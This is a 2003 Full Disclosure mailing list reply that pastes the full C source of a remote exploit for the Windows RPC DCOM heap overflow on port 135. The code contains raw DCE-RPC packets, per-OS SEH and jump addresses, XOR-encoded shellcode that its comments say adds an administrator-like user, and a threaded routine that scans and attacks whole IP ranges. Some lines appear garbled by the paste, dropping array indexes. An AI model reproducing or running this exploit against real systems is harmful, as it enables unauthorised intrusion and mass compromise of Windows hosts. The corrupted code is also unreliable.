Full Disclosure mailing list archives
Re: Re: Bad news on RPC DCOM vulnerability
From: Irwan Hadi <irwanhadi () phxby com>
Date: Fri, 10 Oct 2003 15:06:31 -0600
On Fri, Oct 10, 2003 at 03:34:04PM -0400, Brown, Bobby (US - Hermitage) wrote:
For us that can not interpret the site, what more information can be provided.
I believe if you use babelfish.altavista.com, you'll come to: http://forum.securitylab.ru/forum_posts.asp?TID=5642&PN=0&TPN=3 The code itself is: #include <stdio.h> #include <winsock2.h> #include <windows.h> #include <process.h> #include <string.h> #include <winbase.h> FILE *fp1; unsigned char bindstr[]={ 0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00, 0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00, 0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00, 0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00, 0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00}; unsigned char request1[]={ 0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03 ,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00 ,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45 ,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E ,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D ,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41 ,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00 ,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45 ,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00 ,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00 ,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03 ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00 ,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29 ,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00 ,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00 ,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10 ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF ,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10 ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09 ,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00 ,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00 ,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00 ,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00 ,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01 ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03 ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00 ,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E ,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00 ,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00 ,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00 ,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00 ,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00}; unsigned char request2[]={ 0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00 ,0x00,0x00,0x5C,0x00,0x5C,0x00}; unsigned char request3[]={ 0x46,0x00,0x43,0x00,0x24,0x00,0x46,0x00, 0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00 ,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00 ,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00 ,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00}; unsigned char request4[]={ 0x01,0x10 ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00 ,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C ,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00 }; void XOR(unsigned char *buf,int offset,int lenght,unsigned char mask) { for(int i=offset;i<(offset+lenght);i++) buf=buf^mask; } DWORD GETSTRCS(char *buf) { DWORD cs=0; bool cld=false; for(unsigned int i=0;i<strlen(buf);i++) { for(int z=0;z<13;z++) { if(cs&1) cld=true; cs=cs>>1; if(cld) cs=cs|0x80000000; cld=false; } cs+=buf; } return cs; } struct { DWORD seh; DWORD jmp; DWORD heap; char target[200]; } target_os[]= { { 0x005Bfd2c, 0x00081eeb, 0x00180000, "WinXP" }, { 0x0095fd3c, 0x00081eeb, 0x00170000, "Win2K" } },v; unsigned char rawData1[]= "\x6C\x00\x6F\x00\x63\x00\x61\x00\x6C\x00\x68\x00" "\x6F\x00\x73\x00\x74\x00\x5C\x00\x43\x00\x24\x00\x5C\x00" "\x58\x00\xeb\x3c\x46\x00\x46\x00\xeb\x7c\x46\x00\x46\x00\x38\x6e" "\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01" "\xeb\x1e\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30" "\xf6\xe0\xe0\x93\xdf\xfc\xf2\xf7\xeb\x06\xf1\xe1\xf2\xe1\xea\xd2" //SHELLCODE From SAM ,THANKs ! //Add user SST,password is 557, "\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x4D\x01\x80\x34\x0A\x99\xE2\xFA" "\xEB\x05\xE8\xEB\xFF\xFF\xFF" "\x70\xDA\x98\x99\x99\xCC\x12\x75\x18\x75\x19\x99\x99\x99\x12\x6D" "\x71\x92\x98\x99\x99\x10\x9F\x66\xAF\xF1\x01\x67\x13\x97\x71\x3C" "\x99\x99\x99\x10\xDF\x95\x66\xAF\xF1\xE7\x41\x7B\xEA\x71\x0F\x99" "\x99\x99\x10\xDF\x89\xFD\x38\x81\x99\x99\x99\x12\xD9\xA9\x14\xD9" "\x81\x22\x99\x99\x8E\x99\x10\x81\xAA\x59\xC9\xF3\xFD\xF1\xB9\xB6" "\xF8\xFD\xF1\xB9\xEA\xEA\xED\xF1\xEC\xEA\xFC\xEB\xF1\xF7\xFC\xED" "\xB9\x12\x55\xC9\xC8\x66\xCF\x95\xAA\x59\xC9\xF1\xB9\xAC\xAC\xAE" "\xF1\xB9\xEA\xEA\xED\xF1\xEC\xEA\xFC\xEB\xF1\xF7\xFC\xED\xB9\x12" "\x55\xC9\xC8\x66\xCF\x95\xAA\x59\xC9\xF1\xFD\xFD\x99\x99\xF1\xED" "\xB9\xB6\xF8\xF1\xEA\xB9\xEA\xEA\xF1\xF8\xED\xF6\xEB\xF1\xF0\xEA" "\xED\xEB\xF1\xFD\xF4\xF0\xF7\xF1\xEC\xE9\xB9\xF8\xF1\xF5\xFE\xEB" "\xF6\xF1\xF5\xF6\xFA\xF8\xF1\xF7\xFC\xED\xB9\x12\x55\xC9\xC8\x66" "\xCF\x95\xAA\x59\xC9\x66\xCF\x89\xCA\xCC\xCF\xCE\x12\xF5\xBD\x81" "\x12\xDC\xA5\x12\xCD\x9C\xE1\x9A\x4C\x12\xD3\x81\x12\xC3\xB9\x9A" "\x44\x7A\xAB\xD0\x12\xAD\x12\x9A\x6C\xAA\x66\x65\xAA\x59\x35\xA3" "\x5D\xED\x9E\x58\x56\x94\x9A\x61\x72\x6B\xA2\xE5\xBD\x8D\xEC\x78" "\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D" "\x12\x9A\x5C\x72\x9B\xAA\x59\x12\x4C\xC6\xC7\xC4\xC2\x5B\x9D\x99" "\xCC\xCF\xFD\x38\xA9\x99\x99\x99\x1C\x59\xE1\x95\x12\xD9\x95\x12" "\xE9\x85\x34\x12\xF1\x91\x72\x90\x12\xD9\xAD\x12\x31\x21\x99\x99" "\x99\x12\x5C\xC7\xC4\x5B\x9D\x99\x71\x21\x67\x66\x66" "\x6e\x60\x38\xcc\x54\xd6\x93\xd7\x93\x93\x93\x1a\xce\xaf\x1a\xce" "\xab\x1a\xce\xd3\x54\xd6\xbf\x92\x92\x93\x93\x1e\xd6\xd7\xc3\xc6" "\xc2\xc2\xc2\xd2\xc2\xda\xc2\xc2\xc5\xc2\x6c\xc4\x77\x6c\xe6\xd7" "\x6c\xc4\x7b\x6c\xe6\xdb\x6c\xc4\x7b\xc0\x6c\xc4\x6b\xc3\x6c\xc4" "\x7f\x19\x95\xd5\x17\x53\xe6\x6a" "\xc2\xc1\xc5\xc0\x6c\x41\xc9\xca" "\x1a\x94\xd4\xd4\xd4\xd4\x71\x7a\x50\x90\x90\x90" // "\x90\x90\x90\x90\x90\x90\x90\x90" "\x77\xe0\x43\x00\x00\x10\x5c\x00" "\xeb\x1e\x01\x00"// FOR CN SP3/SP4+-MS03-26 "\x4C\x14\xec\x77"// TOP SEH FOR cn w2k+SP4,must modify to SEH of your target's os //FILL BYTE,so sizeof(UNC)>0X400(0X80*8),why? You can read more form my //artic //"Utilization of released heap structure and exploit of universal Heap //overflow in windows ". "\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x90\x02\x80\x34\x0A\x99\xE2\xFA" "\xEB\x05\xE8\xEB\xFF\xFF\xFF" "\xC7\x5F\x9D\xBD\xDD\x14\xDD\xBD\xDD\xC9\x14\xDD\xBD\x9D\xC9\x14" "\x1D\xBD\x1D\x99\x99\x99\xC9\x14\x1D\xBD\x0D\x99\x99\x99\xC9\xAA" "\x59\xC9\xC9\xC9\xC9\xCA\x14\x1D\xBD\x2D\x99\x99\x99\xC9\x66\xCF" "\x95\x14\xD5\xBD\xDD\x14\x8D\xBD\xAA\x59\xC9\xF1\xAC\x99\xAE\x99" "\xF1\xB9\x99\xAC\x99\xF1\xEA\x99\xED\x99\xF1\xB9\x99\xEA\x99\xF1" "\xFC\x99\xEB\x99\xF1\xEC\x99\xEA\x99\xF1\xED\x99\xB9\x99\xF1\xF7" "\x99\xFC\x99\x12\x45\xC8\xCB\xC8\xCB\x14\x1D\xBD\x29\x99\x99\x99" "\xC9\x14\x1D\xBD\x59\x99\x99\x99\xC9\xAA\x59\xC9\xC9\xC9\xC9\xCA" "\x14\x1D\xBD\x79\x99\x99\x99\xC9\x66\xCF\x95\xC3\xC0\xAA\x59\xC9" "\xF1\xFD\x99\xFD\x99\xF1\xB6\x99\xF8\x99\xF1\xED\x99\xB9\x99\xF1" "\xEA\x99\xEA\x99\xF1\xEA\x99\xB9\x99\xF1\xF6\x99\xEB\x99\xF1\xF8" "\x99\xED\x99\xF1\xED\x99\xEB\x99\xF1\xF0\x99\xEA\x99\xF1\xF0\x99" "\xF7\x99\xF1\xFD\x99\xF4\x99\xF1\xB9\x99\xF8\x99\xF1\xEC\x99\xE9" "\x99\xF1\xEB\x99\xF6\x99\xF1\xF5\x99\xFE\x99\xF1\xFA\x99\xF8\x99" "\xF1\xF5\x99\xF6\x99\xF1\xED\x99\xB9\x99\xF1\xF7\x99\xFC\x99\x12" "\x45\xC8\xCB\x14\x1D\xBD\x61\x99\x99\x99\xC9\x14\x1D\xBD\x91\x98" "\x99\x99\xC9\xAA\x59\xC9\xC9\xC9\xC9\xCA\x14\x1D\xBD\xB1\x98\x99" "\x99\xC9\x66\xCF\x95\xAA\x59\xC9\x66\xCF\x89\xCA\xCC\xCF\xCE\x12" "\xF5\xBD\x81\x12\xDC\xA5\x12\xCD\x9C\xE1\x9A\x4C\x12\xD3\x81\x12" "\xC3\xB9\x9A\x44\x7A\xAB\xD0\x12\xAD\x12\x9A\x6C\xAA\x66\x65\xAA" "\x59\x35\xA3\x5D\xED\x9E\x58\x56\x94\x9A\x61\x72\x6B\xA2\xE5\xBD" "\x8D\xEC\x78\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\x9A" "\x44\x12\x9D\x12\x9A\x5C\x72\x9B\xAA\x59\x12\x4C\xC6\xC7\xC4\xC2" "\x5B\x9D\x99\xCC\xCF\xFD\x38\xA9\x99\x99\x99\x1C\x59\xE1\x95\x12" "\xD9\x95\x12\xE9\x85\x34\x12\xF1\x91\x72\x90\x12\xD9\xAD\x12\x31" "\x21\x99\x99\x99\x12\x5C\xC7\xC4\x5B\x9D\x99\x71\xEC\x64\x66\x66" "\x04\x04\x00\x70\x00\x04\x40" "\x00\x10\x5c\x00\x78\x01\x07\x00\x78\x01\x07\x00\xa0\x04\x00" "\x21\x99\x99\x99\x12\x5C\xC7\xC4\x5B\x9D\x99\x71"; int version(char ip[16], int sock) { //un poco de ettercap... unsigned char peer0_0[] = { 0x05, 0x00, 0x0b, 0x03, 0x10, 0x00, 0x00, 0x00, 0xcc, 0x00, 0x00, 0x00, 0x84, 0x67, 0xbe, 0x18, 0x31, 0x14, 0x5c, 0x16, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0xb8, 0x4a, 0x9f, 0x4d, 0x1c, 0x7d, 0xcf, 0x11, 0x86, 0x1e, 0x00, 0x20, 0xaf, 0x6e, 0x7c, 0x57, 0x00, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00, 0x02, 0x00, 0x01, 0x00, 0xa0, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0x00, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00, 0x03, 0x00, 0x01, 0x00, 0x0a, 0x42, 0x24, 0x0a, 0x00, 0x17, 0x21, 0x41, 0x2e, 0x48, 0x01, 0x1d, 0x13, 0x0b, 0x04, 0x4d, 0x00, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00, 0x04, 0x00, 0x01, 0x00, 0xb0, 0x01, 0x52, 0x97, 0xca, 0x59, 0xcf, 0x11, 0xa8, 0xd5, 0x00, 0xa0, 0xc9, 0x0d, 0x80, 0x51, 0x00, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00 }; unsigned char peer0_1[] = { 0x05, 0x00, 0x00, 0x03, 0x10, 0x00, 0x00, 0x00, 0xaa, 0x00, 0x00, 0x00, 0x41, 0x41, 0x41, 0x41, 0x80, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x28, 0x63, 0x29, 0x20, 0x75, 0x65, 0x72, 0x84, 0x20, 0x73, 0x73, 0x53, 0x20, 0x82, 0x80, 0x67, 0x00, 0x00, 0x00, 0x00, 0x80, 0x1d, 0x94, 0x5e, 0x96, 0xbf, 0xcd, 0x11, 0xb5, 0x79, 0x08, 0x00, 0x2b, 0x30, 0xbf, 0xeb, 0x01, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x5c, 0x00, 0x5c, 0x00, 0x41, 0x00, 0x00, 0x00, 0x41, 0x00, 0x41, 0x00, 0x5c, 0x00, 0x43, 0x00, 0x24, 0x00, 0x5c, 0x00, 0x41, 0x00, 0x2e, 0x00, 0x74, 0x00, 0x78, 0x00, 0x74, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0xff, 0xff, 0xff, 0xff, 0x01, 0x00, 0x00, 0x00, 0x58, 0x73, 0x0b, 0x00, 0x01, 0x00, 0x00, 0x00, 0x31, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x07, 0x00 }; /* unsigned char win2kvuln[] = { 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00}; */ fd_set fds2; unsigned char buf[1024]; int l; struct timeval tv2; FD_ZERO(&fds2); FD_SET(sock, &fds2); tv2.tv_sec = 6; tv2.tv_usec = 0; memset(buf,'\0',sizeof(buf)); send(sock,(char *)peer0_0,sizeof(peer0_0),0); if(select(sock +1, &fds2, NULL, NULL, &tv2) > 0) { l=recv (sock, (char *)buf, sizeof (buf),0); // for(i=0;i<52;i++) // { // if (i==28) i=i+4; // if (buf[i+32]!=win2kvuln) // { send(sock,(const char *)peer0_1,sizeof(peer0_1),0); if(select(sock +1, &fds2, NULL, NULL, &tv2) > 0) { memset(buf,'\0',sizeof(buf)); l=recv (sock, (char *)buf, sizeof (buf),0); if (l==32) { closesocket(sock); return(1);//winxp } else { #ifdef WIN32 closesocket(sock); #else close(sock); #endif return(0);//win2kby default. Nt4 not added.. } } else return(-1); // } //} // closesocket(sock); // return(0);//win2k } closesocket(sock); return(-1); //Unknown } /********************************************************************************/ int attack(char *ip1,bool atack) { unsigned char rawData[1036]; memcpy(rawData,rawData1,1036); unsigned char shellcode[50000]; char ip[200]; strcpy(ip,ip1); WSADATA WSAData; SOCKET sock; int len,len1; SOCKADDR_IN addr_in; short port=135; unsigned char buf1[50000]; unsigned char buf2[50000]; printf("%s\n",ip); //printf("RPC DCOM overflow Vulnerability discoveried by //NSFOCUS\n"); //printf("Code by FlashSky,Flashsky xfocus org\n"); //printf("Welcome to our Site: http://www.xfocus.org\n";); //printf("Welcome to our Site: http://www.venustech.com.cn\n";); /* if(argc!=3) { printf("%s targetIP targetOS\ntargets:\n",argv[0]); for(int i=0;i<sizeof(target_os)/sizeof(v);i++) printf("%d - %s\n",i,target_os.target); printf("\n%x\n",GETSTRCS(argv[1])); return; } */ /* if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0) { printf("WSAStartup error.Error:%d\n",WSAGetLastError()); return; } */ addr_in.sin_family=AF_INET; addr_in.sin_port=htons(port); addr_in.sin_addr.S_un.S_addr=inet_addr(ip); if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET) { printf("Socket failed.Error:%d\n",WSAGetLastError()); return 0; } len1=sizeof(request1); len=sizeof(rawData); if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR) { printf("%s - connect failed\n",ip); return 0; } int vers=!version(ip,sock); // printf("%d\n",vers); // return; // int vers=1; FILE *fp; //...... ..... // fp=fopen("shellcode","rb"); // fread(rawData,1,1036,fp); // fclose(fp); //...... ..... ........ ............... ........... .......! fp=fopen("bshell2","rb"); int sz=fread(shellcode,1,1024,fp); fclose(fp); // printf("%d\n",sz); for(int i=0;i<sz;i++) rawData[i+0x71]=shellcode; // fp=fopen("badfile.exe","rb"); // unsigned int sz1=fread(shellcode,1,50000,fp); // fclose(fp); // for(i=0;i<sz1;i++) // rawData[i+0x240]=shellcode; // fp=fopen("pac","wb"); // fwrite(rawData,1,1036,fp); // fclose(fp); // return; //..... ... ... ....... ....... ..... .......... HEAP'a // DWORD heap=0x00180000; // int k=vers; // vers=1; // *(DWORD *)(rawData+0xae)=target_os[vers].heap; *(DWORD *)(rawData+0x71+0x1e)=target_os[vers].heap; //...... ..... .......... ... ..., ... .... ..... ........ ...... //... ....., ... ..... ...... . ........ ........, ....... //.......... ...., . ........ ...... XOR(rawData,0x71,sz,0x99); // XOR(rawData,0x240,sz1,0x99); //... .. ... ..... ........ ...... ... SEH . JMP DWORD seh=target_os[vers].seh; DWORD jmp=target_os[vers].jmp; *(DWORD *)(rawData+0x22a)=jmp; *(DWORD *)(rawData+0x22e)=seh; // *(WORD *)(rawData+0x62)=sz+sz1+(0x240-(0x71+sz)); *(WORD *)(rawData+0x62)=sz; memcpy(buf2,request1,sizeof(request1)); *(DWORD *)(request2)=*(DWORD *)(request2)+sizeof(rawData)/2; *(DWORD *)(request2+8)=*(DWORD *)(request2+8)+sizeof(rawData)/2; memcpy(buf2+len1,request2,sizeof(request2)); len1=len1+sizeof(request2); memcpy(buf2+len1,rawData,sizeof(rawData)); len1=len1+sizeof(rawData); memcpy(buf2+len1,request3,sizeof(request3)); len1=len1+sizeof(request3); memcpy(buf2+len1,request4,sizeof(request4)); len1=len1+sizeof(request4); *(DWORD *)(buf2+8)=*(DWORD *)(buf2+8)+len-0xc; *(DWORD *)(buf2+0x10)=*(DWORD *)(buf2+0x10)+len-0xc; *(DWORD *)(buf2+0x80)=*(DWORD *)(buf2+0x80)+len-0xc; *(DWORD *)(buf2+0x84)=*(DWORD *)(buf2+0x84)+len-0xc; *(DWORD *)(buf2+0xb4)=*(DWORD *)(buf2+0xb4)+len-0xc; *(DWORD *)(buf2+0xb8)=*(DWORD *)(buf2+0xb8)+len-0xc; *(DWORD *)(buf2+0xd0)=*(DWORD *)(buf2+0xd0)+len-0xc; *(DWORD *)(buf2+0x18c)=*(DWORD *)(buf2+0x18c)+len-0xc; closesocket(sock); if(atack) { sock=socket(2,1,0); WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL); if (send(sock,(const char *)bindstr,sizeof(bindstr),0)==SOCKET_ERROR) { printf("%s - send failed %d\n",ip,WSAGetLastError()); return 0; } else {printf("%s - send exploit to %s\n",ip,target_os[vers].target);} len=recv(sock,(char *)buf1,1000,NULL); bool ft=1; if(ft) { int i=0; while(1) { if (send(sock,(const char *)buf2,len1,0)==SOCKET_ERROR) { printf("\nSend failed.Error:%d\n",WSAGetLastError()); return 0; } else { printf("\r%d",++i); } //Sleep(1000); } } send(sock,(const char *)buf2,len1,0); closesocket(sock); } else fprintf(fp1,"%s %s\n",target_os[vers].target,ip); // fp=fopen("pac","wb"); // fwrite(rawData,1,1036,fp); // fclose(fp); } unsigned long thread_count=0; char adr[200]; DWORD WINAPI ThreadProc( LPVOID lpParameter // thread data ) { thread_count++; attack(adr,0); thread_count--; return 0; } void main(int argc,char ** argv) { //printf("%x %x",OF_READWRITE,GETSTRCS(argv[1])); //return; //HFILE hf=_lopen("asd123",0x1001); //printf("%x",hf); //_lclose(hf); //return; WSADATA wsaData; int wVersionRequested; wVersionRequested = MAKEWORD( 2, 2 ); int err = WSAStartup( wVersionRequested, &wsaData ); if ( err != 0 ) { /* Tell the user that we could not find a usable */ /* WinSock DLL. */ return; } if(strchr(argv[1],'.')) { attack(argv[1],1); Sleep(20000); return; } int cb=1,db=1; cb=atoi(argv[3]); db=atoi(argv[4]); long tm=atoi(argv[5]); for(int c=cb;c<255;c++) { for(int d=db;d<255;d++) { sprintf(adr,"%s.%s.%d.%d",argv[1],argv[2],c,d); if(thread_count>tm) while(thread_count>tm) Sleep(100); CreateThread(NULL,0,&ThreadProc,"",0,NULL); Sleep(10); fflush(fp1); } } Sleep(60000); fclose(fp1); }
